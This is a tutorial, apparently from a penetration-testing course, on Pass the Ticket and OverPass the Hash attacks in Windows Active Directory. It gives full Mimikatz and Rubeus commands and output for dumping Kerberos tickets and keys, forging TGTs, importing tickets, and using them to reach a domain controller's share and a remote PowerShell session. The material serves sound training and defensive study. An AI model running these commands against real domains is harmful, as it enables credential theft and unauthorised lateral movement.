# Pass the Ticket (PtT) from Windows ## Pass the Ticket (PtT) attack ### **Mimikatz - Export tickets** ```cmd-session c:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 329278 (00000000:0005063e) Session : Network from 0 User Name : DC01$ Domain : HTB Logon Server : (null) Logon Time : 7/12/2022 9:39:55 AM SID : S-1-5-18 * Username : DC01$ * Domain : inlanefreight.htb * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 7/12/2022 9:39:55 AM ; 7/12/2022 7:39:54 PM ; Service Name (02) : LDAP ; DC01.inlanefreight.htb ; inlanefreight.htb ; @ inlanefreight.htb Target Name (--) : @ inlanefreight.htb Client Name (01) : DC01$ ; @ inlanefreight.htb Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 31cfa427a01e10f6e09492f2e8ddf7f74c79a5ef6b725569e19d614a35a69c07 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;5063e]-1-0-40a50000-DC01$@LDAP-DC01.inlanefreight.htb.kirbi ! Group 2 - Ticket Granting Ticket mimikatz # exit Bye! c:\tools> dir *.kirbi Directory: c:\tools Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/12/2022 9:44 AM 1445 [0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi -a---- 7/12/2022 9:44 AM 1565 [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi ``` The tickets that end with `$` correspond to the computer account, which needs a ticket to interact with the Active Directory. User tickets have the user's name, followed by an `@` that separates the service name and the domain, for example: `[randomvalue]-username@service-domain.local.kirbi`. > Note: If you pick a ticket with the service krbtgt, it corresponds to the TGT of that account. We can also export tickets using `Rubeus` and the option `dump`. This option can be used to dump all tickets (if running as a local administrator). `Rubeus dump`, instead of giving us a file, will print the ticket encoded in Base64 format. We are adding the option `/nowrap` for easier copy-paste. > Note: At the time of writing, using `Mimikatz version 2.2.0 20220919`, if we run `sekurlsa::ekeys` it presents all hashes as des\_cbc\_md4 on some Windows 10 versions. Exported tickets (sekurlsa::tickets /export) do not work correctly due to the wrong encryption. It is possible to use these hashes to generate new tickets or use Rubeus to export tickets in Base64 format. ### **Rubeus - Export tickets** ```cmd-session c:\tools> Rubeus.exe dump /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 Action: Dump Kerberos Ticket Data (All Users) [*] Current LUID : 0x6c680 ServiceName : krbtgt/inlanefreight.htb ServiceRealm : inlanefreight.htb UserName : DC01$ UserRealm : inlanefreight.htb StartTime : 7/12/2022 9:39:54 AM EndTime : 7/12/2022 7:39:54 PM RenewTill : 7/19/2022 9:39:54 AM Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : KWBMpM4BjenjTniwH0xw8FhvbFSf+SBVZJJcWgUKi3w= Base64EncodedTicket : doIE1jCCBNKgAwIBBaEDAgEWooID7TCCA+lhggPlMIID4aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB0hUQi5DT02jggOvMIIDq6ADAgESoQMCAQKiggOdBIIDmUE/AWlM6VlpGv+Gfvn6bHXrpRjRbsgcw9beSqS2ihO+FY/2Rr0g0iHowOYOgn7EBV3JYEDTNZS2ErKNLVOh0/TczLexQk+bKTMh55oNNQDVzmarvzByKYC0XRTjb1jPuVz4exraxGEBTgJYUunCy/R5agIa6xuuGUvXL+6AbHLvMb+ObdU7Dyn9eXruBscIBX5k3D3S5sNuEnm1sHVsGuDBAN5Ko6kZQRTx22A+lZZD12ymv9rh8S41z0+pfINdXx/VQAxYRL5QKdjbndchgpJro4mdzuEiu8wYOxbpJdzMANSSQiep+wOTUMgimcHCCCrhXdyR7VQoRjjdmTrKbPVGltBOAWQOrFs6YK1OdxBles1GEibRnaoT9qwEmXOa4ICzhjHgph36TQIwoRC+zjPMZl9lf+qtpuOQK86aG7Uwv7eyxwSa1/H0mi5B+un2xKaRmj/mZHXPdT7B5Ruwct93F2zQQ1mKIH0qLZO1Zv/G0IrycXxoE5MxMLERhbPl4Vx1XZGJk2a3m8BmsSZJt/++rw7YE/vmQiW6FZBO/2uzMgPJK9xI8kaJvTOmfJQwVlJslsjY2RAVGly1B0Y80UjeN8iVmKCk3Jvz4QUCLK2zZPWKCn+qMTtvXBqx80VH1hyS8FwU3oh90IqNS1VFbDjZdEQpBGCE/mrbQ2E/rGDKyGvIZfCo7t+kuaCivnY8TTPFszVMKTDSZ2WhFtO2fipId+shPjk3RLI89BT4+TDzGYKU2ipkXm5cEUnNis4znYVjGSIKhtrHltnBO3d1pw402xVJ5lbT+yJpzcEc5N7xBkymYLHAbM9DnDpJ963RN/0FcZDusDdorHA1DxNUCHQgvK17iametKsz6Vgw0zVySsPp/wZ/tssglp5UU6in1Bq91hA2c35l8M1oGkCqiQrfY8x3GNpMPixwBdd2OU1xwn/gaon2fpWEPFzKgDRtKe1FfTjoEySGr38QSs1+JkVk0HTRUbx9Nnq6w3W+D1p+FSCRZyCF/H1ahT9o0IRkFiOj0Cud5wyyEDom08wOmgwxK0D/0aisBTRzmZrSfG7Kjm9/yNmLB5va1yD3IyFiMreZZ2WRpNyK0G6L4H7NBZPcxIgE/Cxx/KduYTPnBDvwb6uUDMcZR83lVAQ5NyHHaHUOjoWsawHraI4uYgmCqXYN7yYmJPKNDI290GMbn1zIPSSL82V3hRbOO8CZNP/f64haRlR63GJBGaOB1DCB0aADAgEAooHJBIHGfYHDMIHAoIG9MIG6MIG3oCswKaADAgESoSIEIClgTKTOAY3p4054sB9McPBYb2xUn/kgVWSSXFoFCot8oQkbB0hUQi5DT02iEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDIyMDcxMjEzMzk1NFqmERgPMjAyMjA3MTIyMzM5NTRapxEYDzIwMjIwNzE5MTMzOTU0WqgJGwdIVEIuQ09NqRwwGqADAgECoRMwERsGa3JidGd0GwdIVEIuQ09N UserName : plaintext Domain : HTB LogonId : 0x6c680 UserSID : S-1-5-21-228825152-3134732153-3833540767-1107 AuthenticationPackage : Kerberos LogonType : Interactive LogonTime : 7/12/2022 9:42:15 AM LogonServer : DC01 LogonServerDNSDomain : inlanefreight.htb UserPrincipalName : plaintext@inlanefreight.htb ServiceName : krbtgt/inlanefreight.htb ServiceRealm : inlanefreight.htb UserName : plaintext UserRealm : inlanefreight.htb StartTime : 7/12/2022 9:42:15 AM EndTime : 7/12/2022 7:42:15 PM RenewTill : 7/19/2022 9:42:15 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : 2NN3wdC4FfpQunUUgK+MZO8f20xtXF0dbmIagWP0Uu0= Base64EncodedTicket : doIE9jCCBPKgAwIBBaEDAgEWooIECTCCBAVhggQBMIID/aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB0hUQi5DT02jggPLMIIDx6ADAgESoQMCAQKiggO5BIIDtc6ptErl3sAxJsqVTkV84/IcqkpopGPYMWzPcXaZgPK9hL0579FGJEBXX+Ae90rOcpbrbErMr52WEVa/E2vVsf37546ScP0+9LLgwOAoLLkmXAUqP4zJw47nFjbZQ3PHs+vt6LI1UnGZoaUNcn1xI7VasrDoFakj/ZH+GZ7EjgpBQFDZy0acNL8cK0AIBIe8fBF5K7gDPQugXaB6diwoVzaO/E/p8m3t35CR1PqutI5SiPUNim0s/snipaQnyuAZzOqFmhwPPujdwOtm1jvrmKV1zKcEo2CrMb5xmdoVkSn4L6AlX328K0+OUILS5GOe2gX6Tv1zw1F9ANtEZF6FfUk9A6E0dc/OznzApNlRqnJ0dq45mD643HbewZTV8YKS/lUovZ6WsjsyOy6UGKj+qF8WsOK1YsO0rW4ebWJOnrtZoJXryXYDf+mZ43yKcS10etHsq1B2/XejadVr1ZY7HKoZKi3gOx3ghk8foGPfWE6kLmwWnT16COWVI69D9pnxjHVXKbB5BpQWAFUtEGNlj7zzWTPEtZMVGeTQOZ0FfWPRS+EgLmxUc47GSVON7jhOTx3KJDmE7WHGsYzkWtKFxKEWMNxIC03P7r9seEo5RjS/WLant4FCPI+0S/tasTp6GGP30lbZT31WQER49KmSC75jnfT/9lXMVPHsA3VGG2uwGXbq1H8UkiR0ltyD99zDVTmYZ1aP4y63F3Av9cg3dTnz60hNb7H+AFtfCjHGWdwpf9HZ0u0HlBHSA7pYADoJ9+ioDghL+cqzPn96VyDcqbauwX/FqC/udT+cgmkYFzSIzDhZv6EQmjUL4b2DFL/Mh8BfHnFCHLJdAVRdHlLEEl1MdK9/089O06kD3qlE6s4hewHwqDy39ORxAHHQBFPU211nhuU4Jofb97d7tYxn8f8c5WxZmk1nPILyAI8u9z0nbOVbdZdNtBg5sEX+IRYyY7o0z9hWJXpDPuk0ksDgDckPWtFvVqX6Cd05yP2OdbNEeWns9JV2D5zdS7Q8UMhVo7z4GlFhT/eOopfPc0bxLoOv7y4fvwhkFh/9LfKu6MLFneNff0Duzjv9DQOFd1oGEnA4MblzOcBscoH7CuscQQ8F5xUCf72BVY5mShq8S89FG9GtYotmEUe/j+Zk6QlGYVGcnNcDxIRRuyI1qJZxCLzKnL1xcKBF4RblLcUtkYDT+mZlCSvwWgpieq1VpQg42Cjhxz/+xVW4Vm7cBwpMc77Yd1+QFv0wBAq5BHvPJI4hCVPs7QejgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmgAwIBEqEiBCDY03fB0LgV+lC6dRSAr4xk7x/bTG1cXR1uYhqBY/RS7aEJGwdIVEIuQ09NohYwFKADAgEBoQ0wCxsJcGxhaW50ZXh0owcDBQBA4QAApREYDzIwMjIwNzEyMTM0MjE1WqYRGA8yMDIyMDcxMjIzNDIxNVqnERgPMjAyMjA3MTkxMzQyMTVaqAkbB0hUQi5DT02pHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB0hUQi5DT00= ``` > Note: To collect all tickets we need to execute Mimikatz or Rubeus as an administrator. This is a common way to retrieve tickets from a computer. Another advantage of abusing Kerberos tickets is the ability to forge our own tickets. Let's see how we can do this using the `Pass the Key` aka. `OverPass the Hash` technique. ## Pass the Key aka. OverPass the Hash The traditional `Pass the Hash` (`PtH`) technique involves reusing an NTLM password hash that doesn't touch Kerberos. The `Pass the Key` aka. `OverPass the Hash` approach converts a hash/key (rc4\_hmac, aes256\_cts\_hmac\_sha1, etc.) for a domain-joined user into a full `Ticket Granting Ticket` (`TGT`). This technique was developed by Benjamin Delpy and Skip Duckwall in their presentation [Abusing Microsoft Kerberos - Sorry you guys don't get it](https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it/18). Also [Will Schroeder](https://twitter.com/harmj0y) adapted their project to create the [Rubeus](https://github.com/GhostPack/Rubeus) tool. To forge our tickets, we need to have the user's hash; we can use Mimikatz to dump all users Kerberos encryption keys using the module `sekurlsa::ekeys`. This module will enumerate all key types present for the Kerberos package. ### **Mimikatz - Extract Kerberos keys** ```cmd-session c:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 444066 (00000000:0006c6a2) Session : Interactive from 1 User Name : plaintext Domain : HTB Logon Server : DC01 Logon Time : 7/12/2022 9:42:15 AM SID : S-1-5-21-228825152-3134732153-3833540767-1107 * Username : plaintext * Domain : inlanefreight.htb * Password : (null) * Key List : aes256_hmac b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 rc4_hmac_nt 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_old 3f74aa8f08f712f09cd5177b5c1ce50f rc4_md4 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_nt_exp 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_old_exp 3f74aa8f08f712f09cd5177b5c1ce50f ``` Now that we have access to the `AES256_HMAC` and `RC4_HMAC` keys, we can perform the OverPass the Hash aka. Pass the Key attack using `Mimikatz` and `Rubeus`. ### **Mimikatz - Pass the Key aka. OverPass the Hash** ```cmd-session c:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f user : plaintext domain : inlanefreight.htb program : cmd.exe impers. : no NTLM : 3f74aa8f08f712f09cd5177b5c1ce50f | PID 1128 | TID 3268 | LSA Process is now R/W | LUID 0 ; 3414364 (00000000:0034195c) \_ msv1_0 - data copy @ 000001C7DBC0B630 : OK ! \_ kerberos - data copy @ 000001C7E20EE578 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001C7E2136BC8 (32) -> null ``` This will create a new `cmd.exe` window that we can use to request access to any service we want in the context of the target user. To forge a ticket using `Rubeus`, we can use the module `asktgt` with the username, domain, and hash which can be `/rc4`, `/aes128`, `/aes256`, or `/des`. In the following example, we use the AES-256 hash from the information we collect using Mimikatz `sekurlsa::ekeys`. ### **Rubeus - Pass the Key aka. OverPass the Hash** ```cmd-session c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Ask TGT [*] Using rc4_hmac hash: 3f74aa8f08f712f09cd5177b5c1ce50f [*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\plaintext' [+] TGT request successful! [*] Base64(ticket.kirbi): doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/LSsa2xrdJJir1eVugDFCoGFT2hDcYcpRdifXw67WofDM6Z6utsha+4bL0z6QN+tdpPlNQFwjuWmBrZtpS9TcCblotYvDHa0aLVsroW/fqXJ4KIV2tVfbVIDJvPkgdNAbhp6NvlbzeakR1oO5RTm7wtRXeTirfo6C9Ap0HnctlHAd+Qnvo2jGUPP6GHIhdlaM+QShdJtzBEeY/xIrORiiylYcBvOoir8mFEzNpQgYADmbTmg+c7/NgNO8Qj4AjrbGjVf/QWLlGc7sH9+tARi/Gn0cGKDK481A0zz+9C5huC9ZoNJ/18rWfJEb4P2kjlgDI0/fauT5xN+3NlmFVv0FSC8/909pUnovy1KkQaMgXkbFjlxeheoPrP6S/TrEQ8xKMyrz9jqs3ENh//q738lxSo8J2rZmv1QHy+wmUKif4DUwPyb4AHgSgCCUUppIFB3UeKjqB5srqHR78YeAWgY7pgqKpKkEomy922BtNprk2iLV1cM0trZGSk6XJ/H+JuLHI5DkuhkjZQbb1kpMA2CAFkEwdL9zkfrsrdIBpwtaki8pvcBPOzAjXzB7MWvhyAQevHCT9y6iDEEvV7fsF/B5xHXiw3Ur3P0xuCS4K/Nf4GC5PIahivW3jkDWn3g/0nl1K9YYX7cfgXQH9/inPS0OF1doslQfT0VUHTzx8vG3H25vtc2mPrfIwfUzmReLuZH8GCvt4p2BAbHLKx6j/HPa4+YPmV0GyCv9iICucSwdNXK53Q8tPjpjROha4AGjaK50yY8lgknRA4dYl7+O2+j4K/lBWZHy+IPgt3TO7YFoPJIEuHtARqigF5UzG1S+mefTmqpuHmoq72KtidINHqi+GvsvALbmSBQaRUXsJW/Lf17WXNXmjeeQWemTxlysFs1uRw9JlPYsGkXFh3fQ2ngax7JrKiO1/zDNf6cvRpuygQRHMOo5bnWgB2E7hVmXm2BTimE7axWcmopbIkEi165VOy/M+pagrzZDLTiLQOP/X8D6G35+srSr4YBWX4524/Nx7rPFCggxIXEU4zq3Ln1KMT9H7efDh+h0yNSXMVqBSCZLx6h3Fm2vNPRDdDrq7uz5UbgqFoR2tgvEOSpeBG5twl4MSh6VA7LwFi2usqqXzuPgqySjA1nPuvfy0Nd14GrJFWo6eDWoOy2ruhAYtaAtYC6OByDCBxaADAgEAooG9BIG6fYG3MIG0oIGxMIGuMIGroBswGaADAgEXoRIEENEzis1B3YAUCjJPPsZjlduhCRsHSFRCLkNPTaIWMBSgAwIBAaENMAsbCXBsYWludGV4dKMHAwUAQOEAAKURGA8yMDIyMDcxMjE1MjgyNlqmERgPMjAyMjA3MTMwMTI4MjZapxEYDzIwMjIwNzE5MTUyODI2WqgJGwdIVEIuQ09NqRwwGqADAgECoRMwERsGa3JidGd0GwdodGIuY29t ServiceName : krbtgt/inlanefreight.htb ServiceRealm : inlanefreight.htb UserName : plaintext UserRealm : inlanefreight.htb StartTime : 7/12/2022 11:28:26 AM EndTime : 7/12/2022 9:28:26 PM RenewTill : 7/19/2022 11:28:26 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : 0TOKzUHdgBQKMk8+xmOV2w== ``` > Note: Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't. To learn more about the difference between Mimikatz `sekurlsa::pth` and Rubeus `asktgt`, consult the Rubeus tool documentation [Example for OverPass the Hash](https://github.com/GhostPack/Rubeus#example-over-pass-the-hash). > Note: Modern Windows domains (functional level 2008 and above) use AES encryption by default in normal Kerberos exchanges. If we use an rc4\_hmac (NTLM) hash in a Kerberos exchange instead of an aes256\_cts\_hmac\_sha1 (or aes128) key, it may be detected as an "encryption downgrade." ## Pass the Ticket (PtT) Now that we have some Kerberos tickets, we can use them to move laterally within an environment. With `Rubeus` we performed an OverPass the Hash attack and retrieved the ticket in Base64 format. Instead, we could use the flag `/ptt` to submit the ticket (TGT or TGS) to the current logon session. ### **Rubeus - Pass the Ticket** ```cmd-session c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Ask TGT [*] Using rc4_hmac hash: 3f74aa8f08f712f09cd5177b5c1ce50f [*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\plaintext' [+] TGT request successful! [*] Base64(ticket.kirbi): doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKh EzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpcGX6rbUlYxOWeMmu/zb f7vGgDj/g+P5zzLbr+XTIPG0kI2WCOlAFCQqz84yQd6IRcEeGjG4YX/9ezJogYNtiLnY6YPkqlQaG1Nn pAQBZMIhs01EH62hJR7W5XN57Tm0OLF6OFPWAXncUNaM4/aeoAkLQHZurQlZFDtPrypkwNFQ0pI60NP2 9H98JGtKKQ9PQWnMXY7Fc/5j1nXAMVj+Q5Uu5mKGTtqHnJcsjh6waE3Vnm77PMilL1OvH3Om1bXKNNan JNCgb4E9ms2XhO0XiOFv1h4P0MBEOmMJ9gHnsh4Yh1HyYkU+e0H7oywRqTcsIg1qadE+gIhTcR31M5mX 5TkMCoPmyEIk2MpO8SwxdGYaye+lTZc55uW1Q8u8qrgHKZoKWk/M1DCvUR4v6dg114UEUhp7WwhbCEtg 5jvfr4BJmcOhhKIUDxyYsT3k59RUzzx7PRmlpS0zNNxqHj33yAjm79ECEc+5k4bNZBpS2gJeITWfcQOp lQ08ZKfZw3R3TWxqca4eP9Xtqlqv9SK5kbbnuuWIPV2/QHi3deB2TFvQp9CSLuvkC+4oNVg3VVR4bQ1P fU0+SPvL80fP7ZbmJrMan1NzLqit2t7MPEImxum049nUbFNSH6D57RoPAaGvSHePEwbqIDTghCJMic2X c7YJeb7y7yTYofA4WXC2f1MfixEEBIqtk/drhqJAVXz/WY9r/sWWj6dw9eEhmj/tVpPG2o1WBuRFV72K Qp3QMwJjPEKVYVK9f+uahPXQJSQ7uvTgfj3N5m48YBDuZEJUJ52vQgEctNrDEUP6wlCU5M0DLAnHrVl4 Qy0qURQa4nmr1aPlKX8rFd/3axl83HTPqxg/b2CW2YSgEUQUe4SqqQgRlQ0PDImWUB4RHt+cH6D563n4 PN+yqN20T9YwQMTEIWi7mT3kq8JdCG2qtHp/j2XNuqKyf7FjUs5z4GoIS6mp/3U/kdjVHonq5TqyAWxU wzVSa4hlVgbMq5dElbikynyR8maYftQk+AS/xYby0UeQweffDOnCixJ9p7fbPu0Sh2QWbaOYvaeKiG+A GhUAUi5WiQMDSf8EG8vgU2gXggt2Slr948fy7vhROp/CQVFLHwl5/kGjRHRdVj4E+Zwwxl/3IQAU0+ag GrHDlWUe3G66NrR/Jg8zXhiWEiViMd5qPC2JTW1ronEPHZFevsU0pVK+MDLYc3zKdfn0q0a3ys9DLoYJ 8zNLBL3xqHY9lNe6YiiAzPG+Q6OByDCBxaADAgEAooG9BIG6fYG3MIG0oIGxMIGuMIGroBswGaADAgEX oRIEED0RtMDJnODs5w89WCAI3bChCRsHSFRCLkNPTaIWMBSgAwIBAaENMAsbCXBsYWludGV4dKMHAwUA QOEAAKURGA8yMDIyMDcxMjE2Mjc0N1qmERgPMjAyMjA3MTMwMjI3NDdapxEYDzIwMjIwNzE5MTYyNzQ3 WqgJGwdIVEIuQ09NqRwwGqADAgECoRMwERsGa3JidGd0GwdodGIuY29t [+] Ticket successfully imported! ServiceName : krbtgt/inlanefreight.htb ServiceRealm : inlanefreight.htb UserName : plaintext UserRealm : inlanefreight.htb StartTime : 7/12/2022 12:27:47 PM EndTime : 7/12/2022 10:27:47 PM RenewTill : 7/19/2022 12:27:47 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : PRG0wMmc4OznDz1YIAjdsA== ``` Note that now it displays `Ticket successfully imported!`. Another way is to import the ticket into the current session using the `.kirbi` file from the disk. Let's use a ticket exported from Mimikatz and import it using Pass the Ticket. ### **Rubeus - Pass the Ticket** ```cmd-session c:\tools> Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Import Ticket [+] ticket successfully imported! c:\tools> dir \\DC01.inlanefreight.htb\c$ Directory: \\dc01.inlanefreight.htb\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 6/4/2022 11:17 AM Program Files d----- 6/4/2022 11:17 AM Program Files (x86) ...SNIP... ``` We can also use the Base64 output from Rubeus or convert a .kirbi to Base64 to perform the Pass the Ticket attack. We can use PowerShell to convert a .kirbi to Base64. ### **Convert .kirbi to Base64 Format** ```powershell-session PS c:\tools> [Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi")) doQAAAWfMIQAAAWZoIQAAAADAgEFoYQAAAADAgEWooQAAAQ5MIQAAAQzYYQAAAQtMIQAAAQnoIQAAAADAgEFoYQAAAAJGwdIVEIuQ09NooQAAAAsMIQAAAAmoIQAAAADAgECoYQAAAAXMIQAAAARGwZrcmJ0Z3QbB0hUQi5DT02jhAAAA9cwhAAAA9GghAAAAAMCARKhhAAAAAMCAQKihAAAA7kEggO1zqm0SuXewDEmypVORXzj8hyqSmikY9gxbM9xdpmA8r2EvTnv0UYkQFdf4B73Ss5ylutsSsyvnZYRVr8Ta9Wx/fvnjpJw/T70suDA4CgsuSZcBSo/jMnDjucWNtlDc8ez6...SNIP... ``` Using Rubeus, we can perform a Pass the Ticket providing the Base64 string instead of the file name. ### **Pass the Ticket - Base64 Format** ```cmd-session c:\tools> Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/...SNIP... ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Import Ticket [+] ticket successfully imported! c:\tools> dir \\DC01.inlanefreight.htb\c$ Directory: \\dc01.inlanefreight.htb\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 6/4/2022 11:17 AM Program Files d----- 6/4/2022 11:17 AM Program Files (x86) ``` Finally, we can also perform the Pass the Ticket attack using the Mimikatz module `kerberos::ptt` and the .kirbi file that contains the ticket we want to import. ### **Mimikatz - Pass the Ticket** ```cmd-session C:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi" * File: 'C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi': OK mimikatz # exit Bye! c:\tools> dir \\DC01.inlanefreight.htb\c$ Directory: \\dc01.inlanefreight.htb\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 6/4/2022 11:17 AM Program Files d----- 6/4/2022 11:17 AM Program Files (x86) ``` > Note: Instead of opening mimikatz.exe with cmd.exe and exiting to get the ticket into the current command prompt, we can use the Mimikatz module `misc` to launch a new command prompt window with the imported ticket using the `misc::cmd` command. ## Mimikatz - PowerShell Remoting with Pass the Ticket To use PowerShell Remoting with Pass the Ticket, we can use Mimikatz to import our ticket and then open a PowerShell console and connect to the target machine. Let's open a new `cmd.exe` and execute `mimikatz.exe`, then import the ticket we collected using `kerberos::ptt`. Once the ticket is imported into our `cmd.exe` session, we can launch a PowerShell command prompt from the same `cmd.exe` and use the command `Enter-PSSession` to connect to the target machine. ### **Mimikatz - Pass the Ticket for lateral movement.** ```cmd-session C:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" * File: 'C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi': OK mimikatz # exit Bye! c:\tools>powershell Windows PowerShell Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\tools> Enter-PSSession -ComputerName DC01 [DC01]: 